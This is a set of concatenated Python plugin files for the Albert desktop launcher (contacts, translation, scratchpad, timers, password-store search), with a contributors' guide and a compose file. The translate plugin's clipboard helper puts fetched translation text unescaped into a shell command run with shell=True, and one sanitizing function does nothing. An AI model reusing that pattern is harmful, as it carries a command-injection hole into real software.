n.show()
{%- endif %}
def get_shell_cmd_as_item(
*, text: str, command: str, subtext: str = None, completion: str = None
):
"""Return shell command as an item - ready to be appended to the items list and be rendered by Albert."""
if subtext is None:
subtext = text
if completion is None:
completion = f"{__triggers__}{text}"
def run(command: str):
proc = subprocess.run(command.split(" "), capture_output=True, check=False)
if proc.returncode != 0:
stdout = proc.stdout.decode("utf-8")
stderr = proc.stderr.decode("utf-8")
notify(f"Error when executing {command}\n\nstdout: {stdout}\n\nstderr: {stderr}")
return v0.Item(
id=__title__,
icon=icon_path,
text=text,
subtext=subtext,
completion=completion,
actions=[
v0.FuncAction(text, lambda command=command: run(command=command)),
],
)
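# A minimal usage sketch (the command is hypothetical) - the returned item runs the
# shell command when actioned and notifies on a non-zero exit code:
#   item = get_shell_cmd_as_item(text="Show UTC date", command="date --utc")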
def get_as_item():
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
return v0.Item(
id=__title__,
icon=icon_path,
text=f"{sys.version}",
subtext="Python version",
completion="",
actions=[
v0.UrlAction("Open in xkcd.com", "https://www.xkcd.com/"),
v0.ClipAction("Copy URL", f"https://www.xkcd.com/"),
],
)
def sanitize_string(s: str) -> str:
    return s.replace("<", "&lt;")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name: str) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
def data_exists(data_name: str) -> bool:
"""Check whwether a piece of data exists in the configuration directory."""
return (config_path / data_name).is_file()
def setup(query):
"""Setup is successful if an empty list is returned.
    Use this function if you need the user to provide you with data
"""
results = []
return results
<file_sep>"""Contact VCF Viewer."""
import json
import subprocess
import traceback
from pathlib import Path
from shutil import copyfile, which
from typing import Any, Dict, List, Optional, Sequence
import albert as v0
import gi
from fuzzywuzzy import process
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip # type: ignore
md_name = "Contacts"
md_description = "Contact VCF Viewer"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/contacts"
md_bin_dependencies = []
md_lib_dependencies = []
icon_path = str(Path(__file__).parent / "contacts")
cache_path = Path(v0.cacheLocation()) / "contacts"
config_path = Path(v0.configLocation()) / "contacts"
data_path = Path(v0.dataLocation()) / "contacts"
stats_path = config_path / "stats"
vcf_path = Path(cache_path / "contacts.vcf")
class Contact:
def __init__(
self,
fullname: str,
telephones: Optional[Sequence[str]],
emails: Optional[Sequence[str]] = None,
):
self._fullname = fullname
self._telephones = telephones or []
self._emails = emails or []
@property
def fullname(self) -> str:
return self._fullname
@property
def telephones(self) -> Sequence[str]:
return self._telephones
@property
def emails(self) -> Sequence[str]:
return self._emails
@classmethod
def parse(cls, k, v):
def values(name: str) -> Sequence[Any]:
array = v.get(name)
if array is None:
return []
return [item["value"] for item in array]
return cls(
fullname=k,
telephones=[tel.replace(" ", "") for tel in values("tel")],
emails=values("email"),
)
contacts: List[Contact]
fullnames_to_contacts: Dict[str, Contact]
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def reindex_contacts() -> None:
global contacts, fullnames_to_contacts
contacts = get_new_contacts()
fullnames_to_contacts = {c.fullname: c for c in contacts}
def get_new_contacts() -> List[Contact]:
proc = subprocess.run(
["vcfxplr", "-c", str(vcf_path), "json", "-g", "fn"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
contacts_json = json.loads(proc.stdout)
return [Contact.parse(k, v) for k, v in contacts_json.items()]
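# Sketch of the JSON shape consumed above, as inferred from Contact.parse - each full
# name maps to field arrays of {"value": ...} entries (the example data is hypothetical):
#   {"Jane Doe": {"tel": [{"value": "+44 123456"}], "email": [{"value": "jane@doe.org"}]}}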
# FileBackedVar class -------------------------------------------------------------------------
class FileBackedVar:
def __init__(self, varname, convert_fn=str, init_val=None):
self._fpath = config_path / varname
self._convert_fn = convert_fn
if init_val:
with open(self._fpath, "w") as f:
f.write(str(init_val))
else:
self._fpath.touch()
def get(self):
with open(self._fpath, "r") as f:
return self._convert_fn(f.read().strip())
def set(self, val):
with open(self._fpath, "w") as f:
return f.write(str(val))
# plugin main functions -----------------------------------------------------------------------
def do_notify(msg: str, image=None):
app_name = "Contacts"
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
# supplementary functions ---------------------------------------------------------------------
def sanitize_string(s: str) -> str:
    return s.replace("<", "&lt;")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name: str) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
def data_exists(data_name: str) -> bool:
"""Check whwether a piece of data exists in the configuration directory."""
return (config_path / data_name).is_file()
def save_vcf_file(query: str):
    p = Path(query).expanduser().absolute()
    if not p.is_file():
        do_notify(f'Given path "{p}" is not valid - please input it again.')
        # bail out - otherwise copyfile below would raise on a non-existent path
        return

    copyfile(p, vcf_path)
    reindex_contacts()
    do_notify(f"Copied VCF contacts file to -> {vcf_path}. You should be ready to go...")
def setup(query) -> bool: # type: ignore
if not which("vcfxplr"):
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text='"vcfxplr" is not installed.',
subtext=(
"You can install it via pip - <u>pip3 install --user --upgrade vcfxplr</u>"
),
actions=[
ClipAction(
"Copy install command", "pip3 install --user --upgrade vcfxplr"
),
UrlAction(
'Open "vcfxplr" page', "https://github.com/bergercookie/vcfxplr"
),
],
)
)
return True
if vcf_path.exists() and not vcf_path.is_file():
raise RuntimeError(f"vcf file exists but it's not a file -> {vcf_path}")
if not vcf_path.exists():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Please input the path to your VCF contacts file.",
subtext=f"{query.string}",
actions=[
FuncAction(
"Save VCF file", lambda query=query: save_vcf_file(query.string)
),
],
)
)
return True
return False
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "c "
def synopsis(self):
return "TODO"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
if vcf_path.is_file():
reindex_contacts()
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
results_setup = setup(query)
if results_setup:
return
query_str = query.string
if not query_str:
results.append(
v0.Item(
id=md_name,
icon=[icon_path],
completion=query.trigger,
text="Add more characters to fuzzy-search",
actions=[],
)
)
results.append(self.get_reindex_item(query))
else:
matched = process.extract(query_str, fullnames_to_contacts.keys(), limit=10)
results.extend(
[
self.get_contact_as_item(query, fullnames_to_contacts[m[0]])
for m in matched
]
)
query.add(results)
except Exception: # user to report error
v0.critical(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
def get_reindex_item(self, query):
return v0.Item(
id=md_name,
icon=[icon_path],
text="Re-index contacts",
completion=query.trigger,
actions=[FuncAction("Re-index contacts", reindex_contacts)],
)
def get_contact_as_item(self, query, contact: Contact):
"""
Return an item - ready to be appended to the items list and be rendered by Albert.
"""
text = contact.fullname
phones_and_emails = set(contact.emails).union(contact.telephones)
subtext = " | ".join(phones_and_emails)
completion = f"{query.trigger}{contact.fullname}"
actions = []
for field in phones_and_emails:
actions.append(ClipAction(f"Copy {field}", field))
actions.append(ClipAction("Copy name", contact.fullname))
return v0.Item(
id=md_name,
icon=[icon_path],
text=text,
subtext=subtext,
completion=completion,
actions=actions,
)
<file_sep>= Contributors' Guidelines =
* Make sure the commit subject line is formatted in imperative form and, more
  generally, follows these guidelines: https://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
* Explain concisely what functionality the current PR serves and, if applicable,
  how it should be tested.
* Keep your branch **rebased** on top of the latest target destination branch
  (i.e., master, or devel if applicable). The PR must be rebased before the
  actual merge.
Thanks for contributing to the project! :-)
<file_sep># -*- coding: utf-8 -*-
"""Translate text using Google Translate.
Usage: tr <src lang> <dest lang> <text>
Example: tr en fr hello
Check available languages here: https://cloud.google.com/translate/docs/languages
20191229 - bergercookie: Send a request only when the user has "slowed-down" typing (0.3s diff
between two consecutive chars) so that we send less requests to google. This way the IP is not
blocked.
"""
import ast
import json
import subprocess
import time
import traceback
import urllib.parse
import urllib.request
from collections import deque
from pathlib import Path
from typing import Deque, Dict, Optional
import albert as v0
md_name = "Google Translate"
md_description = "Google Translate to from different languages."
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins"
md_bin_dependencies = ["xclip"]
md_lib_dependencies = []
ua = (
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)"
" Chrome/62.0.3202.62 Safari/537.36"
)
url_template = (
"https://translate.googleapis.com/translate_a/single?client=gtx&sl=%s&tl=%s&dt=t&q=%s"
)
icon_path = str(Path(__file__).parent / "google_translate")
icon_path_hist = str(Path(__file__).parent / "google_translate_gray")
cache_path = Path(v0.cacheLocation()) / "google_translate"
data_path = Path(v0.dataLocation()) / "google_translate"
# have a history of the previous results ------------------------------------------------------
history_path = cache_path / "history.dat"
history_deque: Deque[Dict[str, str]] = deque(maxlen=30)
if history_path.exists() and not history_path.is_file():
raise RuntimeError(f"History path [{history_path}] must be a file, can't handle its type!")
if history_path.is_file():
with open(history_path, "r") as f:
lines = f.readlines()
history_deque.extend([ast.literal_eval(li) for li in lines])
def flush_history():
v0.info(f"Flushing google_translate history -> {history_path}...")
    # TODO This kind of usage is theoretically unsafe, but is unlikely to matter in
    # practice. The timer fires every ~1hr and traversing the deque takes very little time.
with open(history_path, "w") as f:
for di in history_deque:
f.write(f"{di}\n")
# plugin main functions -----------------------------------------------------------------------
class KeystrokeMonitor:
def __init__(self):
super(KeystrokeMonitor, self)
self.thres = 0.4 # s
self.prev_time = time.time()
self.curr_time = time.time()
def report(self):
self.prev_time = time.time()
self.curr_time = time.time()
self.report = self.report_after_first # type: ignore
def report_after_first(self):
# update prev, curr time
self.prev_time = self.curr_time
self.curr_time = time.time()
def triggered(self) -> bool:
return self.curr_time - self.prev_time > self.thres
def reset(self) -> None:
self.report = self.report_after_first # type: ignore
keys_monitor = KeystrokeMonitor()
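# Usage pattern (as in handleQuery below): call report() on every keypress, and only
# fire the network request once typing has paused for more than `thres` seconds.
#   keys_monitor.report()
#   if keys_monitor.triggered():
#       ...  # safe to hit the translate endpoint now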
def select_item(lang_config: Dict[str, str], result: str):
save_search_result(**lang_config, dst_txt=result)
subprocess.Popen(f"echo {result}| xclip -selection clipboard", shell=True)
def save_search_result(*, src: str, dst: str, src_txt: str, dst_txt: str):
# sanity checks
if len(src_txt) <= 2 or len(dst_txt) <= 2:
return
history_deque.append(
{
"src": src,
"dst": dst,
"src_txt": src_txt,
"dst_txt": dst_txt,
}
)
# write it to file as well
flush_history()
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "tr "
def synopsis(self):
return "<src> <dst> <text>"
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
flush_history()
def get_history_item(self, query, *, src: str, dst: str, src_txt: str, dst_txt) -> v0.Item:
return v0.Item(
id=f"{md_name}_prev_result",
text=dst_txt,
subtext=src_txt,
icon=[icon_path_hist],
completion=f"{query.trigger}{src} {dst} {src_txt}",
)
def get_sample_item(
self,
text: str = "",
subtext: str = "",
actions=[],
completion="",
):
if text == "":
text = 'Enter a query in the form of "<src> <dst> <text>"'
if subtext == "":
subtext = "Use <TAB> to reverse the translation"
return v0.Item(
id=md_name,
text=text,
subtext=subtext,
icon=[icon_path],
completion=completion,
actions=actions,
)
def handleQuery(self, query) -> None:
try:
fields = query.string.split()
if len(fields) < 3:
keys_monitor.reset()
query.add(self.get_sample_item())
return
src = fields[0]
dst = fields[1]
txt = " ".join(fields[2:])
completion = f"{query.trigger}{dst} {src} {txt}"
# determine if we can make the request --------------------------------------------
text = ""
subtext = ""
actions = []
keys_monitor.report()
if keys_monitor.triggered():
url = url_template % (src, dst, urllib.parse.quote_plus(txt))
req = urllib.request.Request(url, headers={"User-Agent": ua})
with urllib.request.urlopen(req) as response:
data = json.loads(response.read().decode("utf-8"))
result = data[0][0][0]
text = result
subtext = "%s -> %s: %s" % (
src.upper(),
dst.upper(),
txt,
)
actions = [
FuncAction(
"Copy translation to clipboard",
lambda lang_config={
"src": src,
"dst": dst,
"src_txt": txt,
}, result=result: select_item(
lang_config=lang_config, result=result
),
),
UrlAction(
"Open in browser",
f"https://translate.google.com/#view=home&op=translate&sl={src.lower()}&tl={dst.lower()}&text={txt}",
),
]
query.add(
self.get_sample_item(
text=text, subtext=subtext, actions=actions, completion=completion
)
)
# Show previous results
iterator = reversed(history_deque)
try:
next(iterator)
for di in iterator: # last is the most recent
query.add(
self.get_history_item(
query,
src=di["src"],
dst=di["dst"],
src_txt=di["src_txt"],
dst_txt=di["dst_txt"],
)
)
except StopIteration:
pass
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep>version: '3'
services:
awesome-albert-plugins:
volumes:
- .:/src
build:
context: .
args:
UID: 1000
GID: 1000
SRC: "/src"
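# Usage sketch (assuming a standard docker-compose install):
#   docker-compose build                        # bakes UID/GID/SRC into the image
#   docker-compose run awesome-albert-plugins   # runs with . mounted at /src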
<file_sep>"""Scratchpad - Dump all your thoughts into a single textfile."""
import textwrap
import traceback
from pathlib import Path
import albert as v0
import gi  # isort:skip

gi.require_version("Notify", "0.7")  # isort:skip
from gi.repository import Notify  # isort:skip
md_name = "Scratchpad"
md_description = "Scratchpad - Dump all your thoughts into a single textfile"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/scratchpad"
)
md_bin_dependencies = []
md_lib_dependencies = []
icon_path = str(Path(__file__).parent / "scratchpad")
cache_path = Path(v0.cacheLocation()) / "scratchpad"
config_path = Path(v0.configLocation()) / "scratchpad"
data_path = Path(v0.dataLocation()) / "scratchpad"
s_store_fname = config_path / "fname"
# break long lines at the specified width
split_at_textwidth = 80
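# e.g. with split_at_textwidth = 80, textwrap.fill() below re-wraps a long dumped
# thought so that no line in the scratchpad file exceeds 80 characters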
# plugin main functions -----------------------------------------------------------------------
if s_store_fname.is_file():
    with open(s_store_fname, "r") as f:
        p = Path(f.readline().strip()).expanduser()
        s_path = p if p.is_file() else Path()
else:
    s_path = Path()
def save_to_scratchpad(line: str, sep=False):
with open(s_path, "a+") as f:
if split_at_textwidth is not None:
towrite = textwrap.fill(line, split_at_textwidth)
else:
towrite = line
towrite = f"\n{towrite}"
s = ""
if sep:
s = "\n\n" + "-" * 10 + "\n"
towrite = f"{s}{towrite}\n"
towrite = f"{towrite}\n"
f.write(towrite)
# supplementary functions ---------------------------------------------------------------------
def notify(
msg: str,
app_name: str = md_name,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def get_as_item(query):
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
query_str = query.string.strip()
return v0.Item(
id=md_name,
icon=[icon_path],
text="Save to scratchpad",
subtext=query_str,
completion=f"{query.trigger}{query_str}",
actions=[
FuncAction(
f"Save to scratchpad ➡️ {s_path}",
lambda line=query_str: save_to_scratchpad(line),
),
FuncAction(
f"Save to scratchpad - New Section ➡️ {s_path}",
lambda line=query_str: save_to_scratchpad(line, sep=True),
),
],
)
def sanitize_string(s: str) -> str:
    return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def submit_fname(p: Path):
p = p.expanduser().resolve()
with open(s_store_fname, "w") as f:
f.write(str(p))
global s_path
s_path = p
# also create it
s_path.touch()
def setup(query):
"""Setup is successful if an empty list is returned."""
query_str = query.string
# abbreviations file
if not s_path.is_file():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Specify the location of the scratchpad file",
subtext="Paste the path to the file, then press ENTER",
actions=[
FuncAction("Submit path", lambda p=query_str: submit_fname(Path(p))),
],
)
)
return True
return False
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "s "
def synopsis(self):
return "add text to scratchpad"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
# trigger if the user has either explicitly called the plugin or when we have detected
# many words in the query. The latter is just a heuristic; I haven't decided whether
# it's worth keeping
if len(query.string.split()) < 4:
return
try:
results_setup = setup(query)
if results_setup:
return
results.append(get_as_item(query))
except Exception: # user to report error
v0.critical(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep>"""Countdown/Stopwatch functionalities."""
import subprocess
import threading
import time
import traceback
from abc import ABC, abstractmethod
from pathlib import Path
from typing import List, Optional, Union
import albert as v0
import gi # isort:skip
gi.require_version("Notify", "0.7") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip
md_name = "Countdown/Stopwatch"
md_description = "Countdown/Stopwatch functionalities"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/clock"
md_bin_dependencies = ["cvlc"]
countdown_path = str(Path(__file__).parent / "countdown.png")
stopwatch_path = str(Path(__file__).parent / "stopwatch.png")
sound_path = Path(__file__).parent.absolute() / "bing.wav"
cache_path = Path(v0.cacheLocation()) / "clock"
config_path = Path(v0.configLocation()) / "clock"
data_path = Path(v0.dataLocation()) / "clock"
# plugin main functions -----------------------------------------------------------------------
def play_sound(num):
for x in range(num):
t = threading.Timer(
0.5 * x,
lambda: subprocess.Popen(
[
"cvlc",
sound_path,
]
),
)
t.start()
def notify(app_name: str, msg: str, image=None):
if image is not None:
image = str(image)
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def format_time(t: float):
"""Return the string representation of t. t must be in *seconds*"""
if t >= 60:
return f"{round(t / 60.0, 2)} mins"
else:
return f"{round(t, 2)} secs"
def play_icon(started) -> str:
return "▶️" if started else "⏸"
class Watch(ABC):
def __init__(
self,
app_name: str,
image_path: str,
name: Optional[str],
started: bool = False,
total_time: float = 0.0,
):
self._name = name if name is not None else ""
self._to_remove = False
self._started = started
self._app_name = app_name
self._image_path = image_path
self._total_time = total_time
def name(
self,
) -> Optional[str]:
return self._name
def plus(self, mins: int):
self._total_time += 60 * mins
def minus(self, mins: int):
self._total_time -= 60 * mins
@abstractmethod
def start(self):
pass
def started(self) -> bool:
return self._started
@abstractmethod
def pause(self):
pass
def destroy(self):
self.notify(msg=f"Cancelling [{self.name()}]")
def notify(self, msg: str):
notify(app_name=self._app_name, msg=msg, image=self._image_path)
    def to_remove(
        self,
    ) -> bool:
        return self._to_remove
class Stopwatch(Watch):
def __init__(self, name=None):
super(Stopwatch, self).__init__(
name=name, app_name="Stopwatch", image_path=stopwatch_path, total_time=0
)
self.latest_stop_time = 0
self.latest_interval = 0
self.start()
def start(self):
self.latest_start = time.time()
self._started = True
self.notify(msg=f"Stopwatch [{self.name()}] starting")
def pause(self):
stop_time = time.time()
self.latest_interval = stop_time - self.latest_start
self._total_time += self.latest_interval
self._started = False
self.notify(
msg=f"Stopwatch [{self.name()}] paused, total: {format_time(self._total_time)}"
)
self.latest_stop_time = stop_time
def __str__(self):
# current interval
if self.started():
latest = time.time()
current_interval = latest - self.latest_start
total = self._total_time + current_interval
else:
latest = self.latest_stop_time
current_interval = self.latest_interval
total = self._total_time
s = get_as_subtext_field(play_icon(self._started))
s += get_as_subtext_field(self.name())
s += get_as_subtext_field(
format_time(total),
"Total",
)
s += get_as_subtext_field(
format_time(current_interval),
"Current Interval",
)[:-2]
return s
class Countdown(Watch):
def __init__(
self,
name: str,
count_from: float,
):
super(Countdown, self).__init__(
app_name="Countdown", image_path=countdown_path, name=name, total_time=count_from
)
self.latest_start = 0
self.start()
def start(self):
self._started = True
self.latest_start = time.time()
self.timer = threading.Timer(
self._total_time,
self.time_elapsed,
)
self.timer.start()
self.notify(
msg=(
f"Countdown [{self.name()}] starting, remaining:"
f" {format_time(self._total_time)}"
)
)
def pause(self):
self._started = False
self._total_time -= time.time() - self.latest_start
if self.timer:
self.timer.cancel()
self.notify(
msg=(
f"Countdown [{self.name()}] paused, remaining:"
f" {format_time(self._total_time)}"
)
)
def time_elapsed(self):
self.notify(msg=f"Countdown [{self.name()}] finished")
play_sound(1)
self._to_remove = True
def destroy(self):
super().destroy()
self.timer.cancel()
def __str__(self):
s = get_as_subtext_field(play_icon(self._started))
s += get_as_subtext_field(self.name())
# compute remaining time
total_time = self._total_time
if self.started():
total_time -= time.time() - self.latest_start
s += f"Remaining: {format_time(total_time)}"
return s
all_watches: List[Watch] = []
def catch_n_notify(fn):
def wrapper(*args, **kargs):
try:
fn(*args, **kargs)
except Exception:
notify(app_name=md_name, msg=f"Operation failed.\n\n{traceback.format_exc()}")
return wrapper
@catch_n_notify
def create_stopwatch(name) -> None:
all_watches.append(Stopwatch(name=name))
@catch_n_notify
def create_countdown(name: str, duration: Optional[float] = None) -> None:
if duration is None:
notify(app_name="Countdown", msg="No duration specified")
return
all_watches.append(
Countdown(
name=name,
count_from=float(duration) * 60,
)
)
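# Usage sketch (hypothetical names): create_countdown("tea", duration=3) notifies
# and rings after 3 minutes; create_stopwatch("workout") starts counting up right away.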
def delete_item(item: Watch):
item.destroy()
all_watches.remove(item)
# supplementary functions ---------------------------------------------------------------------
def get_as_item(item: Watch) -> v0.Item:
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
actions = []
if item.started():
actions.append(
FuncAction(
"Pause",
lambda: item.pause(),
)
)
else:
actions.append(
FuncAction(
"Resume",
lambda: item.start(),
)
)
actions.append(
FuncAction(
"Remove",
lambda: delete_item(item),
)
)
actions.append(
FuncAction(
"Add 30 mins",
lambda: item.plus(30),
)
)
actions.append(
FuncAction(
"Substract 30 mins",
lambda: item.minus(30),
)
)
actions.append(
FuncAction(
"Add 5 mins",
lambda: item.plus(5),
)
)
actions.append(
FuncAction(
"Substract 5 mins",
lambda: item.minus(5),
)
)
return v0.Item(
id=md_name,
icon=[countdown_path if isinstance(item, Countdown) else stopwatch_path],
text=str(item),
subtext="",
actions=actions,
)
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(
config_path / data_name,
"w",
) as f:
f.write(data)
def load_data(
data_name,
) -> str:
"""Load a piece of data from the configuration directory."""
with open(
config_path / data_name,
"r",
) as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "cl "
def synopsis(self):
return "TODO"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (
cache_path,
config_path,
data_path,
):
p.mkdir(
parents=False,
exist_ok=True,
)
def finalize(self):
pass
def handleQuery(
self,
query,
) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
query_parts = [s.strip() for s in query.string.split()]
name = ""
if query_parts:
name = query_parts[0]
subtext_name = f"Name: {name}"
else:
subtext_name = "Please provide a name"
# ask for duration - only applicable for countdowns
duration = None
if len(query_parts) > 1:
duration = query_parts[1]
subtext_dur = f"Duration: {duration} mins"
else:
subtext_dur = "Please provide a duration [mins]"
results.extend(
[
v0.Item(
id=md_name,
icon=[countdown_path],
text="Create countdown",
subtext=f"{subtext_name} | {subtext_dur}",
completion=query.trigger,
actions=[
FuncAction(
"Create countdown",
lambda name=name, duration=duration: create_countdown(
name=name, duration=duration
),
)
],
),
v0.Item(
id=md_name,
icon=[stopwatch_path],
text="Create stopwatch",
subtext=subtext_name,
completion=query.trigger,
actions=[
FuncAction(
"Create stopwatch",
lambda name=name: create_stopwatch(name),
)
],
),
]
)
# cleanup watches that are done
to_remove = [watch for watch in all_watches if watch.to_remove()]
for watch in to_remove:
delete_item(watch)
except Exception: # user to report error
v0.critical(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[countdown_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep>"""Access UNIX Password Manager Items using fuzzy search."""
import os
import shutil
import subprocess
import sys
import traceback
from pathlib import Path
from typing import Sequence
import albert as v0
import gi
from fuzzywuzzy import process
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip # type: ignore
md_name = "Pass"
md_description = "Pass - UNIX Password Manager - fuzzy search"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/pass_rlded"
)
icon_path = os.path.join(os.path.dirname(__file__), "pass_rlded")
cache_path = Path(v0.cacheLocation()) / "pass_rlded"
config_path = Path(v0.configLocation()) / "pass_rlded"
data_path = Path(v0.dataLocation()) / "pass_rlded"
pass_dir = Path(
os.environ.get(
"PASSWORD_STORE_DIR", os.path.join(os.path.expanduser("~/.password-store/"))
)
)
# https://gist.github.com/bergercookie/d808bade22e62afbb2abe64fb1d20688
# For an updated version feel free to contact me.
pass_open_doc = shutil.which("pass-open-doc")
pass_open_doc_exts = [
".jpg",
".jpeg",
".pdf",
".png",
]
def pass_open_doc_compatible(path: Path) -> bool:
"""Determine if the given path can be opened via pass_open_doc."""
if not shutil.which("pass-open-doc"):
return False
return len(path.suffixes) >= 2 and path.suffixes[-2] in pass_open_doc_exts
# passwords cache -----------------------------------------------------------------------------
class PasswordsCacheManager:
def __init__(self, pass_dir: Path):
self.refresh = True
self._pass_dir = pass_dir
def _refresh_passwords(self) -> Sequence[Path]:
passwords = tuple(self._pass_dir.rglob("**/*.gpg"))
save_data("\n".join((str(p) for p in passwords)), "password_paths")
return passwords
def get_all_gpg_files(self) -> Sequence[Path]:
"""Get a list of all the ggp-encrypted files under the given dir."""
passwords: Sequence[Path]
if self.refresh is True or not data_exists("password_paths"):
passwords = self._refresh_passwords()
self.refresh = False
else:
passwords = tuple(Path(p) for p in load_data("password_paths"))
return passwords
passwords_cache = PasswordsCacheManager(pass_dir=pass_dir)
# plugin main functions -----------------------------------------------------------------------
